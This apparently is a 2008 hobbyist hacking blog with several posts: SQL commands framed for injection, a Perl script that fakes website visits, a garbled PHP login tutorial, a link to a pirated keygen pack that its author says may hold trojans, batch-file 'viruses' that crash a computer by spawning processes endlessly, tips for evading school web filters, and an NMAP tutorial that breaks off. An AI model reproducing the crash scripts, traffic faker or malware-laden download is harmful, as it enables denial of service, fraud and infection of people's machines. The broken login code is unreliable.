Monday, June 9, 2008

Some SQL Commands

Here is a list of SQL commands and what they do, these would be used in some injection methods and of course legitimate sql functions. On thier own they wont exploit anything but eventually you'll find an exploit that needs these and they are good to know for injection or just to better understand how SQL works.ABORT -- abort the current transactionALTER DATABASE -- change a databaseALTER GROUP -- add users to a group or remove users from a groupALTER TABLE -- change the definition of a tableALTER TRIGGER -- change the definition of a triggerALTER USER -- change a database user accountANALYZE -- collect statistics about a databaseBEGIN -- start a transaction blockCHECKPOINT -- force a transaction log checkpointCLOSE -- close a cursorCLUSTER -- cluster a table according to an indexCOMMENT -- define or change the comment of an objectCOMMIT -- commit the current transactionCOPY -- copy data between files and tablesCREATE AGGREGATE -- define a new aggregate functionCREATE CAST -- define a user-defined castCREATE CONSTRAINT TRIGGER -- define a new constraint triggerCREATE CONVERSION -- define a user-defined conversionCREATE DATABASE -- create a new databaseCREATE DOMAIN -- define a new domainCREATE FUNCTION -- define a new functionCREATE GROUP -- define a new user groupCREATE INDEX -- define a new indexCREATE LANGUAGE -- define a new procedural languageCREATE OPERATOR -- define a new operatorCREATE OPERATOR CLASS -- define a new operator class for indexesCREATE RULE -- define a new rewrite ruleCREATE SCHEMA -- define a new schemaCREATE SEQUENCE -- define a new sequence generatorCREATE TABLE -- define a new tableCREATE TABLE AS -- create a new table from the results of a queryCREATE TRIGGER -- define a new triggerCREATE TYPE -- define a new data typeCREATE USER -- define a new database user accountCREATE VIEW -- define a new viewDEALLOCATE -- remove a prepared queryDECLARE -- define a cursorDELETE -- delete rows of a tableDROP AGGREGATE -- remove a user-defined aggregate functionDROP CAST -- remove a user-defined castDROP CONVERSION -- remove a user-defined conversionDROP DATABASE -- remove a databaseDROP DOMAIN -- remove a user-defined domainDROP FUNCTION -- remove a user-defined functionDROP GROUP -- remove a user groupDROP INDEX -- remove an indexDROP LANGUAGE -- remove a user-defined procedural languageDROP OPERATOR -- remove a user-defined operatorDROP OPERATOR CLASS -- remove a user-defined operator classDROP RULE -- remove a rewrite ruleDROP SCHEMA -- remove a schemaDROP SEQUENCE -- remove a sequenceDROP TABLE -- remove a tableDROP TRIGGER -- remove a triggerDROP TYPE -- remove a user-defined data typeDROP USER -- remove a database user accountDROP VIEW -- remove a viewEND -- commit the current transactionEXECUTE -- execute a prepared queryEXPLAIN -- show the execution plan of a statementFETCH -- retrieve rows from a table using a cursorGRANT -- define access privilegesINSERT -- create new rows in a tableLISTEN -- listen for a notificationLOAD -- load or reload a shared library fileLOCK -- explicitly lock a tableMOVE -- position a cursor on a specified row of a tableNOTIFY -- generate a notificationPREPARE -- create a prepared queryREINDEX -- rebuild corrupted indexesRESET -- restore the value of a run-time parameter to a default valueREVOKE -- remove access privilegesROLLBACK -- abort the current transactionSELECT -- retrieve rows from a table or viewSELECT INTO -- create a new table from the results of a querySET -- change a run-time parameterSET CONSTRAINTS -- set the constraint mode of the current transactionSET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current sessionSET TRANSACTION -- set the characteristics of the current transactionSHOW -- show the value of a run-time parameterSTART TRANSACTION -- start a transaction blockTRUNCATE -- empty a tableUNLISTEN -- stop listening for a notificationUPDATE -- update rows of a tableVACUUM -- garbage-collect and optionally analyze a database

generate fake website users

PHP


use LWP::Simple; print "Website Visitor Faker\n"; print "coded in perl by Athleone\n\n"; print "Type the website you want to fake visits to.\n"; print ">"; $site=; print "Checking whether site is valid..."; chomp($site); $check=get($site); if($check ne "") { print "Site $site valid.\n\n"; } else { die "Site $site not valid.\n\n"; } print "Type the number of visits you want added.\n"; print ">"; $visitz=; chomp($visitz); for($i=1;$i<=$visitz;$i++) { get($site); print "Visited site $i time(s)....\n"; } print "Done.";

Friday, June 6, 2008

Login form


Hey so this is my first tutorial, this isn't a step by step tutorial as you can see i have just wrote a login script and explained what i was doing as i go along if it is a success i will write a register tutorial as well. Thanks KiNgY
PHP:
The session_start(); function is important and needs to go at the start of each page you want logged in members to access.The include() function just includes my db_connect script which allows me access to my database.
PHP:
This i feel is rather self explanatory, the value of $id depends on which fields of data are missing, i will use $id further down the script to display certain error messages.If the required data is entered it will be queried against my database and if there is a row with username $user and password $pass the login is a success and the session username is set and the user is forwarded onto a different page in this case logged_in.php.HTML for the login formthere is also some php in here for displaying error messages


PHP:
'' && $id<='3'){ echo ""; }if($id=='5'){ echo ""; }?>
User Login
Please fill in missing fields (*)
Sorry but your login details where incorrect

PHP:
* "; }?>Username:

PHP:
* "; }?>Password:
LinksIf you would like to see the completed code please visit here:Full source codeThanks again KiNgY

Thursday, June 5, 2008

large universal keygen

this has no creds to me i just found it on the internet and it looks legit. supposedly there are trojans but some of the files dont have and the trojans are actually the keygens themselves. so use at your own risk.

http://depositfiles.com/files/3403897features
: ACDSee 8.0 Photo Manager Keygen - ACDSee 9.0 Photo Manager Keygen Rus - ACDSee 10 Photo Manager Serial - Adobe Acrobat 8.0 Keygen - Adobe Contribute CS3 Keygen - Adobe CS3 Design Premium Keygen - Adobe CS3 Master Collection Keygen - Adobe CS3 Web Premium Keygen - Adobe Dreamweaver CS3 Keygen - Adobe Encore CS3 Keygen - Adobe Fireworks CS3 Keygen - Adobe Flash CS3 Keygen - Adobe InDesign CS3 Keygen - Adobe PageMaker 7.0 Serial - Adobe Photoshop CS2 9.0 Keygen - Adobe Photoshop CS3 Keygen - Adobe Photoshop CS Serial - Adobe Photoshop Extended CS3 Keygen - Adobe Premier Pro 7.0 - Adobe Premier Pro CS3 Keygen - AnyDVD HD v6.1.3.3 Key - AnyDVD HD v6.1.7.0 Key - AnyDVD HD v6.1.75 Patch - AutoCAD 2008 Keygen - AVAST32 - Avi mpg splitter 2.31 - Corel Draw X3 Keygen - DVD Region CSS Free v5.16 Crack - DVD-Lab Pro 2.3 Crack - Error Doctor 2008 - HyperCam v2.10.02 Crack - ImTOO DVD Ripper 2.0 Serial - Kingdia DVD Ripper Keygen - Macromedia Dreamweaver MX Serial - Macromedia Flash MX Serial Rus - Macromedia HomeSite Serial - Microsoft Office 2003 Serial - Microsoft Office 2007 Keygen - Nero 7 Ultra Edition Keygen - Nero 8 Ultra Edition 8.1.1.0 Keygen - Partition Magic v8.0.1242 Serial - PerfectDisk.8 - PC Video Converter Studio 4.6 Serial - PowerCHM 5.5 Crack - PowerDVD 6 Keygen - Reg Organizer 4.10 Keygen Rus - RegClean 2007 Edition v2.6 Patch - Sitecraft v1.1 Serial - Sokrat Personal v4.1 - Sound Forge 7 Keygen Rus - Sound Forge 8 Keygen Rus - Sound Forge 9a Patch - StripSaver 2.13 Keygen - System Mechanic Professional v5.0 Serial - TuneUp_Utilities 2008 - Throttle 2008 - Ulead GIF Animator v5.05 Crack - Virtual Drive 9.03 Serial Rus - Virtual Drive 10 Serial - WinDVD 7 - WinDVD Platinum 8.0.06.110 Keygen - Xilisoft 3GP Video Converter 2.1.55.1008 Keygen - СозКомек 3.0 Serial

Crash Someone's Computer In Less Than A Minute! "Only For Education Purpose"

O.K Just like Last Time This Virus Uses CMD.EXE(Something.bat) -First open up Notepad -Then type in this code

@echo off B: start CMD.exe Goto B

-then save it as Havetosee.bat this code will open up CMD an Infinite Amount of times Causing the Computer to Crash *I give Credit to H4XZOR For Correcting The Code* *I am Not Responsible for any harm done to your computer or to any one else's computer


Another example:


yea well still this is the best code to crash a pc ^^
@echo off start %0 pause

Proxy Tutorial

HIDE YOUR SELF!! OS:Windows XP Alright here is my tutorial on hiding you ass on the net. When I say hide your ass I mean hiding your with multiple proxy programs and proxy sites. First off when your at school you know how you want to see a site its blocked so you use a proxy site like... www.proxify.com which is blocked at most schools now so you would have to use a different one like www.freeproxy.com/ which shouldn't be block if it is you may use any others of your choice. You just enter the url into the boxes and BAM your onto the sites you want. Some of you may use proxies like 127.0.0.1:8080 Yeah i know the ip is localhost but i dont know any off hand right now. You can find many proxy lists out there to use. I will attach my proxy list I use for some of the programs I mention at the bottom. First off this isn't using programs like proxy firewall the programs i use here are all extensions for mozilla firefox so they will probably work for the linux OS. Now lets get started install mozilla firefox if you haven't already. The programs you can use proxies with are.....
proxysel foxtor foxyproxy httProxy PhProxy Proxy toolbar SwitchProxyTool TorbuttonNow these are just the proxy programs the programs i use to hide my data from the computer itself is...
Distrust Stealther Tamper Data TrackMeNot

NMAP Tutorial

OS: Windows Alright NMAP is a popular scanner used for figuring out information about servers like what operating system they may be running on what ports are open. It offers a loggin system that allows a user to log all the results for their scanning session so they can pass it on to others For this tutorial I am going to just scan a single website and explain a common 'error' message some users may recieve. The website for this Tutorial i will be using is... www.meow.com some random site Now lets get started first off get nmap from our downloads section Got it okay scanned it okay fucked it okay now place these files in your system32 folder or a folder you store your CLI(command line interface) programs in. Open CMDand type nmap and you will get the following syntax and options... lun0s@~E:\cmds>nmap Nmap 4.20 ( http://insecure.org ) Usage: nmap [Scan Type(s)] [Options] {target specification} TARGET SPECIFICATION: Can pass hostnames, IP addresses, networks, etc. Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 -iL : Input from list of hosts/networks -iR : Choose random targets --exclude : Exclude hosts/networks --excludefile : Exclude list from file HOST DISCOVERY: -sL: List Scan - simply list targets to scan -sP: Ping Scan - go no further than determining if host is online -P0: Treat all hosts as online -- skip host discovery -PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes -n/-R: Never do DNS resolution/Always resolve [default: sometimes] --dns-servers : Specify custom DNS servers --system-dns: Use OS's DNS resolver SCAN TECHNIQUES: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans --scanflags : Customize TCP scan flags -sI : Idlescan -sO: IP protocol scan -b : FTP bounce scan PORT SPECIFICATION AND SCAN ORDER: -p : Only scan specified ports Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080 -F: Fast - Scan only the ports listed in the nmap-services file) -r: Scan ports consecutively - don't randomize SERVICE/VERSION DETECTION: -sV: Probe open ports to determine service/version info --version-intensity : Set from 0 (light) to 9 (try all probes) --version-light: Limit to most likely probes (intensity 2) --version-all: Try every single probe (intensity 9) --version-trace: Show detailed version scan activity (for debugging) OS DETECTION: -O: Enable OS detection (try 2nd generation w/fallback to 1st) -O2: Only use the new OS detection system (no fallback) -O1: Only use the old (1st generation) OS detection system --osscan-limit: Limit OS detection to promising targets --osscan-guess: Guess OS more aggressively TIMING AND PERFORMANCE: Options which take